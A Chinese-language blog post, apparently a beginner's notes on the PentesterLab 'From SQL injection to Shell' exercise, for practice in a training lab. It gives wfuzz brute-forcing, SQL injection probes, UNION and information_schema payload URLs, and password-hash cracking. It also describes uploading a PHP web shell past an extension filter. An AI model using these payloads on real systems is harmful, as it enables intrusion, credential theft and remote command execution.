[SQL注入1]From SQL injection to Shell

第一次写,希望大神们多指点。

对于刚接触WEB渗透测试这块的朋友们,很希望能有个平台可以练习。网络上有不少,十大渗透测试演练系统,我这里推荐一个在10以外,适合初学者一步一步进步的平台PENTESTERLAB,网址如下:http://www.pentesterlab.com/

刚开始学,我碰到很多困难,如对数据库不够熟悉,对PHP不熟悉,对各种大神的工具不熟悉。积沙成塔,滴水穿石,我们一步一步踏实地学,可能也用不了多久,就深入这行了。

不废话了,进入正题。

From SQL injection to Shell 这关,大家先网上去下载平台和说明书,本文是我学习过程的笔记,基本上是翻译版的说明书,网上没找到多少这个平台的答案,让大神们遗笑大方。

新手最好自己先练习,官网上讲学习者自己研究,答案只会让你进步变慢。

http://www.pentesterlab.com/exercises/from_sqli_to_shell/

[SQL注入1]From SQL injection to Shell

第一步:查找指纹(指纹是信息,可以用于之后的攻击)

1.nmap 端口

2.telnet

3.fiddles或brupsuit查看request headers和服务器的response

HTTP/1.1 200 OK

Date: Thu, 24 Nov 2011 04:40:51 GMT

Server: Apache/2.2.16 (Debian)

X-Powered-By: PHP/5.3.3-7+squeeze3

Vary: Accept-Encoding

Content-Length: 1335

Content-Type: text/html

4.目录内容暴力嗅探 wfuzz

试出指定目录下存在的文件

wfuzz.py -z  file -f  commons.txt  --hc  404 http://vulnerable/FUZZ.php

第二步:嗅探和开发SQL注入

1.嗅探:

猜想服务器上脚本

[SQL注入1]From SQL injection to Shell

整型参数试探

/article.php?id=2'  如果报错语法错误,说明存在漏洞(从SQL的语法来看,不难理解)

/article.php?id=2-1 不报错,如果显示是1图则存在漏洞

字符型参数试探

[SQL注入1]From SQL injection to Shell

如果加1个  '   将报错

如果加两个'  不报错

也可以使用'--来试探   这个是备注符

[SQL注入1]From SQL injection to Shell

[SQL注入1]From SQL injection to Shell

如果参数位于是在SQL语句内部,

[SQL注入1]From SQL injection to Shell

可以用 ' and '1'='1 来试探

[SQL注入1]From SQL injection to Shell

再用 ' and '1'='0 来试探,可能报错,也可能查询得其它结果

2.开发SQL注入漏洞

使用UNION

[SQL注入1]From SQL injection to Shell

UNION是将两个查询语句的结果合并起来。UNION连接的两个查询结果。

下面简单介绍一下UNION功能

如下两表

[SQL注入1]From SQL injection to Shell

要找出来所有有营业额 (sales) 的日子

SELECT Date FROM Store_Information

UNION

SELECT Date FROM Internet_Sales

结果:

[SQL注入1]From SQL injection to Shell

查询语句的前面部分我们无法修改,因为这些是PHP中的代码。然而,我们可以利用UNION尝试其它表格的信息。

[SQL注入1]From SQL injection to Shell

一个重要的规则,UNION连接的两个查询语句必须查询相等数量的列,否则将出错。

[SQL注入1]From SQL injection to Shell

3.利用UNION开发

a.利用UNION试探出列的数量

b.找出显示的列

c.尝试出数据库meta-tables中的信息

d.尝试出其它数据库或表中的信息

有两种方法可以试出列的数量

         使用UNION SELECT 和增加列的数量

         使用ORDER BY

例源语句如下:

SELECT id,name,price FROM articles where id=1

         尝试   SELECT id,name,price FROM articles where id=1 UNION SELECT 1

将报错

         尝试    SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2

将报错

         尝试   SELECT id,name,price FROM articles where id=1 UNION SELECT 1,2,3

没有报错

注:这个是MYSQL方法理论,与其它数据库可能不同。1,2,3……可以换成null,null,null……,UNION两端的字段类型需要一致(或兼容)。

另一种方法是ODER BY

[SQL注入1]From SQL injection to Shell

利用ORDER BY,我们可试出字段名。

还有,我们可以用数字,

[SQL注入1]From SQL injection to Shell

如果数字大于列数,将报错。例如10

[SQL注入1]From SQL injection to Shell

由上面的结果,我们可以构建如下

[SQL注入1]From SQL injection to Shell

4.试信息

利用MYSQL自带的函数current_user(),version()和database()

构建如下:

http://www.vulnerable.com/cat.php?id=1%20union%20select%201,@@version,3,4

http://www.vulnerable.com/cat.php?id=1%20union%20select%201,version%28%29,3,4

我们查到MYSQL的版本号

[SQL注入1]From SQL injection to Shell

MYSQL5.0以后包含数据库information_schema,我可利用它个数据 库构建语句。

         1 UNION SELECT 1,table_name,3,4 FROM

information_schema.tables

         1 UNION SELECT 1,column_name,3,4 FROM

information_schema.columns

         1 UNION SELECT 1, table_name, column_name,4 FROM

information_schema.columns

         1 UNION SELECT  1,concat(table_name,':', column_name),3,4 FROM

information_schema.columns

比较上面几个语句,后面一个使查询结果变得更直观。可以清楚地知道information_schema数据库中表与字段。我们发现其中有个user表,构建语句

[SQL注入1]From SQL injection to Shell

查询结果出来了,好激动。

[SQL注入1]From SQL injection to Shell

密码是md5加密,可以google,找解密网站。也可以用john工具进行破解。

破解出来密码是:P4ssw0rd

第三步:登陆网站注入代码

用账号密码登陆网站,找到上传文件位置,上传一个php脚本,

如shell.php,内容如下:

[SQL注入1]From SQL injection to Shell

上传报错,可能是对文件扩展名进行了过滤。把扩散名改成php3试试,如果还是不行,再试其它的。

上传完了,接下来就是确定shell.php3的路径。这可以查看图片的HTML代码中查找到

[SQL注入1]From SQL injection to Shell

接下来,构建试下命令uname

[SQL注入1]From SQL injection to Shell

这里所能执行的命令与应用的权限有关系,如果应用安装时是管理员账号,攻击者会获取到管理员的权限。

出于安全,应用应在普通用户下安装,并给该用户尽可能低的权限。

谢谢大家读完,欢迎大家交流。

上一篇:java中常见的六种线程池详解


下一篇:(转)Eclipse中快速输入System.out.println()的快捷键